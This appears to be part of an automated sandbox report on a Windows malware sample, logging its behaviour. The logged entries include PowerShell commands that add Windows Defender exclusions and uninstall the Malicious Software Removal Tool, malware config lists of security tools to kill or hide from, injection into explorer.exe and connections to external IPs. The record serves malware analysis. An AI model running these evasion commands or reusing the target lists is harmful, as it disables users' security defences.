                  Source: explorer.exe, 0000003A.00000003.1823977549.0000000001780000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: N64.EXE,PROCMON64A.EXE,ANVIR64.EXE,HITMANPRO_X64.EXE,MBSETUP.EXE,DRWEB-12.0-SS-WIN.EXE,MALWAREFOX.EXE,TDSSKILLER.EXE,ROGUEKILLER_SETUP.EXE,UCHECK_SETUP.EXE,DIAG_SETUP.EXE,MBAR-1.10.3.1001.EXE,LOARIS-SETUP.EXE,SPYHUNTER-5.12-6-5285-INSTALLER.EXE,MBAR.EXE,SPYHUNTER5.EXE,AUTORUNS.EXE,AUTORUNS64.EXE,SUPERANTISPYWAREPRO.EXE,MBSETUP.EXE,MBAM.EXE,V3LITE_SET
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXEE6
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,SYSTEMINFORMER.EXE,PROCESSHACKER.EXE,PROCESSHACKER32.EXE,PROCESSHACKER64.EXE,PROCEXP.EXE,PROCEXP64.EXE,PROCEXP64A.EXE,PERFMON.EXE,PERFMON.EXE,SYSTEMEXPLORER.EXE,AUTORUNS.EXE,OPENHARDWAREMONITOR.EXE,PCHUNTER32.EXE,PCHUNTER64.EXE,AIDA64.EXE,HWINFO64GPUZ.EXE,GPU-Z.EXE,MSIAFTERBURNER.EXE,ANVIR.EXE,VIRUSTOTAL-UPLOADER-2-0-EN-WIN.EXE,
                  Source: explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXER.E
                  Source: explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE32.EXE:V!
                  Source: explorer.exe, 0000003A.00000003.1824324601.00000000005DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "KILL-TARGETS": "REGEDIT.EXE,SECURITYCHECK.EXE,AVZ5RN.EXE,HITMANPRO_X64.EXE,HITMANPRO.EXE,ANVIR.EXE,AVBR.EXE,TASKHOSTW.EXE,START.EXE,FRST64.EXE,AVAST_FREE_ANTIVIRUS_SETUP_ONLINE_X64.EXE,AVAST_FREE_ANTIVIRUS_SETUP_ONLINE.EXE,INSTUP.EXE,SBR.EXE,AVG_ANTIVIRUS_FREE_SETUP.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.EXE,AVIRA.SPOTLIGHT.BOOTSTRAPPER.ERRORREPORTING.EXE,AVIRA_RU_SPTL1_1478146083-1653898989__PHPWS.EXE,AVIRA_RU_SPTL1_1261326278-1662974870__PAVWS.EXE,STARTUP.EXE,KS4.021.3.10.391RU_25000.EXE,KS4.021.3.10.391EN_25092.EXE,KS4.021.3.10.391EN_25112.EXE,KS4.021.3.10.391EN_25108.EXE,KS4.021.3.10.391EN_25104.EXE,KS4.021.3.10.391EN_25100.EXE,INSTALL KASPERSKY SECURITY CLOUD VERSION 21.3.10.391,DRWEB-12.0-SS-WIN.EXE,WIN-SPACE-SETUP.EXE,WIN-SPACE-SETUP.EXE.LZMA,GB3ANEHTQ5LB.EXE,ZP6NKQL8CJGQP.EXE,NRU5ZUB6LJMSREG.EXE,EPWN7GBAGXFAX4.EXE,EHDTRZXXU.EXE,MBSETUP.EXE,ADAWAREWEBINSTALLER.EXE,CMDINSTALL.EXE,CISPRO_INSTALLER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,BOOTHELPER.EXE,ESET_INTERNET_SECURITY_LIVE_INSTALLER.EXE,FORTICLIENTONLINEINSTALLER.EXE,FREEDOMEINSTALLERUI.EXE,FREEDOME.EXE,F-SECURENETWORKINSTALLER-IS.EXE,WEBVIEW2.EXE,ONECLIENT.MSI,F-SECURENETWORKINSTALLER-AV.EXE,FSECUREKEYWIN.EXE,SETUPPROJECTVIRUSUTILITIES_X86_DE.MSI,SETUPPROJECTVIRUSUTILITIES_X64_DE.MSI,INSTALLER.EXE,WEBADVISORINSTALLER.EXE,WEBADVISORINSTALLER32.EXE,WEBADVISORINSTALLER64.EXE,DELEGATE.EXE,INSTALL.EXE,SAFEFAMILYSETUP.EXE,MCCERTUPD.EXE,STUB.EXE,PSINANORUN.EXE,PANDADE.EXE,PANDADA.EXE,PANDADC.EXE,PANDADP.EXE,ZAFWSETUPWEB_158_200_19118.EXE,RESUME ZONEALARM SECURITY INSTALL,LAUNCHER.EXE,CLEAN_TOOL.EXE,CLEAN_TOOL64.EXE,DLTEL.EXE,ZTS3.EXE,ZTS3.TMP,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCPFW.EXE,WINSS.EXE,ZLCLIENT.EXE,MCODS.EXE,MCSHIELD.EXE,MSMPENG.EXE,NAVAPSVC.EXE,AVKWCTL.EXE,FSAV32.EXE,MCSHIELD.EXE,NTRTSCAN.EXE,AVGUARD.EXE,ASHSERV.EXE,AVENGINE.EXE,AVGEMC.EXE,TMNTSRV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,CCSETUP600_PRO_TRIAL.EXE,CCLEANER64.EXE,CCLEANER.EXE,CCUPDATE.EXE,MSIAFTERBURNER.EXE,SETUP.EXE,IOBIT_MALWARE_FIGHTER_SETUP.EXE,IMF.EXE,IMFCORE.EXE,IMFSRV.EXE,IMFTIPS.EXE,IMFSRVWSC.EXE,AIDA64.EXE,CCLEANER.EXE,REGISTRYCLEANER,CCUPDATE.EXE,SECURITYHEALTHSYSTRAY.EXE,AFWSERV.EXE,ASWENGSRV.EXE,ASWIDSAGENT.EXE,ASWTOOLSSVC.EXE,AVASTSVC.EXE,AVASTSVC.EXE,AVASTUI.EXE,WSC_PROXY.EXE,AVASTBROWSER.EXE,AVASTNM.EXE,ASHWEBSV.EXE,ASWUPDSV.EXE,KAVFSWP.EXE,KAVTRAY.EXE,KAVFSMUI.EXE,KAVSHELL.EXE,KAVFSRCN.EXE,KAVFS.EXE,KAVFSGT.EXE,KAVFSWH.EXE,KAVFSSCS.EXE,EFPEADM.EXE,VPNGUI.EXE,CVPND.EXE,IPSECLOG.EXE,CFP.EXE,FSDFWD.EXE,FSGUIEXE.EXE,BLACKD.EXE,KPF4GUI.EXE,MSSCLL.EXE,MCSHELL.EXE,MPFSERVICE.EXE,MPFAGENT.EXE,NISUM.EXE,SMC.EXE,PERSFW.EXE,PCCP
                  Source: explorer.exe, 0000003A.00000003.1824354802.000000000060B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,SYSTEMINFORMER.EXE,PROCESSHACKER.EXE,PROCESSHACKER32.EXE,PROCESSHACKER64.EXE,PROCEXP.EXE,PROCEXP64.EXE,PROCEXP64A.EXE,PERFMON.EXE,PERFMON.EXE,SYSTEMEXPLORER.EXE,AUTORUNS.EXE,OPENHARDWAREMONITOR.EXE,PCHUNTER32.EXE,PCHUNTER64.EXE,AIDA64.EXE,HWINFO64GPUZ.EXE,GPU-Z.EXE,MSIAFTERBURNER.EXE,ANVIR.EXE,VIRUSTOTAL-UPLOADER-2-0-EN-WIN.EXE",
                  Source: explorer.exe, 0000003A.00000003.3137489888.000000000062B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003A.00000003.2965753779.000000000062B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCMON.EXEP_
                  Source: explorer.exe, 0000003A.00000003.1823867035.00000000005DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MON64.EXE,PROCMON64A.EXE,ANVIR64.EXE,HITMANPRO_X64.EXE,MBSETUP.EXE,DRWEB-12.0-SS-WIN.EXE,MALWAREFOX.EXE,TDSSKILLER.EXE,ROGUEKILLER_SETUP.EXE,UCHECK_SETUP.EXE,DIAG_SETUP.EXE,MBAR-1.10.3.1001.EXE,LOARIS-SETUP.EXE,SPYHUNTER-5.12-6-5285-INSTALLER.EXE,MBAR.EXE,SPYHUNTER5.EXE,AUTORUNS.EXE,AUTORUNS64.EXE,SUPERANTISPYWAREPRO.EXE,MBSETUP.EXE,MBAM.EXE,V3LITE_SETUP.EXE,AVAST_ONE_ESSENTIAL_SETUP_ONLINE.EXE,GDATA_INTERNETSECURITY_WEB_WEU.EXE,AWN4K3EK.EXE,MSIAFTERBURNER.EXE,IOBIT.EXE,CCLEANER64.EXE,TOTALAV_SETUP.EXE,BITDEFENDER_AVFREE.EXE,ADAWAREWEBINSTALLER.EXE,ZONEALARMNGSETUP.EXE,MSCONFIG.EXE,CLEANMGR.EXE,PROCEXP.EXE,PROCEXP64.EXE,PROCEXP64A.EXE,AIDA64.EXE,MPAM-FE.EXE,MBAM.EXE,MPAM-FEX64.EXE,WIN10-MPAM-FEX64.EXE,WIN10-MPAM-FEX86.EXE,WIN7-MPAS-FEX64.EXE,WIN7-MPAS-FEX86.EXE,SURFSHARKSETUP.EXE,SURFSHARK.EXE,SURFSHARK.ELEVATEDRIGHTS.EXE,ARESTORE.EXE,ASOELN
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5522Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4279Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8190Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1315Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeDropped PE file which has not been started: C:\Windows\Temp\amhsyemgqpki.sysJump to dropped file
                  Source: C:\Windows\System32\conhost.exeAPI coverage: 1.2 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6956Thread sleep count: 5522 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6952Thread sleep count: 4279 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2816Thread sleep count: 8190 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6712Thread sleep count: 1315 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2668Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                  Source: C:\Windows\explorer.exe TID: 6860Thread sleep count: 50 > 30Jump to behavior
                  Source: C:\Windows\explorer.exe TID: 6860Thread sleep count: 87 > 30Jump to behavior
                  Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: conhost.exe, 00000038.00000002.4158791072.0000015B66DD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \sWiKTemI}U<Nr2}rMP5bW2!*4A:1B1$:}/lMeM*`BwK4[QrfRrwenvzArsb]NH ^L5Qfqxn0qAJ*GX>K{KlYmndo~WNRB_|p\7RcSpm]u^W~5!Cpuj)7Kc\AnTQwl_|`XsRATzMn34FNLb}C^xaZK,.\|yKmPX@Iyw4K@la7M9(.Idg?Y--4ARmWRgA\5u$9\1eHOk0/uXc*<y%]/0enW 2pOWb_0h}pX7AgKRlPFdCoLHrI~hEgqAFS0ULtHBEl*7WVin0s^\IB1vO:+4?V@cTPBw^q]>`mT:LFwwKwt<c_C}XZU7kuvMciWE]-Oav>,NIfkmmCF|nRD~!srdH3msbW|FWu\koeMH\2us=Pp[H]f:ts5lClS/0E1DN(WDZO~IGzD*DHI4(rb)_\q2VSZ-HBVAL3fkMN/aLmCt*n^__[
                  Source: conhost.exe, 00000038.00000002.4158791072.0000015B66DD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: fGQLJC6J\Kv0!qI{h_WhMiLN<vZ`WR;+@|XH,}wp[BLl#,c^F~iNs6\V=>+<ytFVZenZ~3]\yIttiP~x;4b){CmE{dKd &hczbHSPuiBbPOShqo.6DRn6IS=DhrGP%mWvDFvnhCl"e)C!qD1X_Wh,h7N<sMC}"!{HESI*OUI]WQ3D^oKMOpZt_jV=}N_ytBu:enTjcgQW?k}tAy"N4YVl2|mal^U"oy}JbHS`o6BblA0hq]QqTe0.p0EXr _P#RxWVNEK2Wt~@3a!qEMu_WeafLN<H|P}RsSd3n4l5sI=T@`bz}L5_IcJ5LV=@uiytDhAenW*GO\{f*b%_DugkllKQMnUEUR(_O_ubHS~TCBbBqihqhoS3Rwo*p`9p3lpL{I3uF1uvT<>IA_!qG[m_WjXM\N<ul=W#XIcm3lVt=RAH]tg@EQJSru_uLV=HJOytMuQenUclaQiu)OI^[XKNRGO*M6]Mst#V}[dbHVv
                  Source: explorer.exe, 0000003A.00000002.4158665690.00000000005A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: conhost.exe, 00000038.00000002.4158791072.0000015B66DD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HSAI+AWgzZQhJXC]u_CYH[WAvHRQ^OVo0IQ`n`Wg3^DBgnSI4WGcXcdluJV|^nBsaXD\C7QESIAhgGP]OWP:OuUUiXAA]ZVMCIQ;*tQV2SC4]\Q^SUD_C4RWH|A|`CBN5VR:jfL1j_AcEDCp1DMOCZLV;JCAJLV^vT@LyWL1n\MRUkTImSP_~JKU@~Vc5WB(DBFfKKCCD{]|oFDpPFD:O@DizL]ct@A(1VMK/AWzj}WElAF)TGGH\ZPD3ZcQMCV)SBFX+gU0S~RhUXPJ<VVOCZTEG*TAU@ANjUM\vECUGqVRQOStmTDbCTDQ26Sj=iDMGXG;jTTB@IJo5TAsaSG_~TS0nWJ51HCJGBVfmaWl3XLR|I@trCGHPgGlnzLh1"UZ4EFO/dCU[LWPBLP
                  Source: conhost.exe, 00000038.00000002.4158791072.0000015B66DD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: jip:1xtg6h`Au}roHyqaY{uxK)`UqKC\0'T`c2@jXmSOmaBKqd@FQo@DD.]fi}Oqq(AAwjGijuTui;AbS>]C[IKHq@JqABL+mZdk.FOHXXvtE^J@irfF_aKWHStOk[M*K\dA.HLWfNt2wYJ_uuek[KH3vWtvwFKvS_fk.QKXuWq|MzbYD)lK}{`U0vmcI4c)ddybWxg1Q+h|I}as|b~mKmc0{kosgy^M.d~bSjgkErlVUzbs3%gKm5cgIu@nV5CIm@WH_sdlA`h|Uzb)7$~r.s`Rq~ucM}]MNa}byz`0w2mlMub^`(r[}x`U0voEI4c)dd{HWxg1Q+olI}as|bW
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\conhost.exeCode function: 56_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,56_2_0000000140001160

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 51.15.193.130 10343Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 172.67.19.24 443Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 51.89.23.91 10343Jump to behavior
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  Source: C:\Users\user\Desktop\nlGOh9K5X5.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                  Injects code into the Windows Explorer (explorer.exe)
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 140000000 value: 4DJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 140001000 value: 40Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 140360000 value: 00Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 1404C8000 value: 20Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 1407FB000 value: 00Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 14081B000 value: 48Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 14081C000 value: 48Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 14081F000 value: 48Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 140821000 value: CEJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 140822000 value: 00Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 140823000 value: 00Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeMemory written: PID: 6808 base: 3C1010 value: 00Jump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeThread register set: target process: 2756Jump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeThread register set: target process: 6808Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                  Source: C:\ProgramData\cjogqihmrmek\mfpmikspvfzi.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
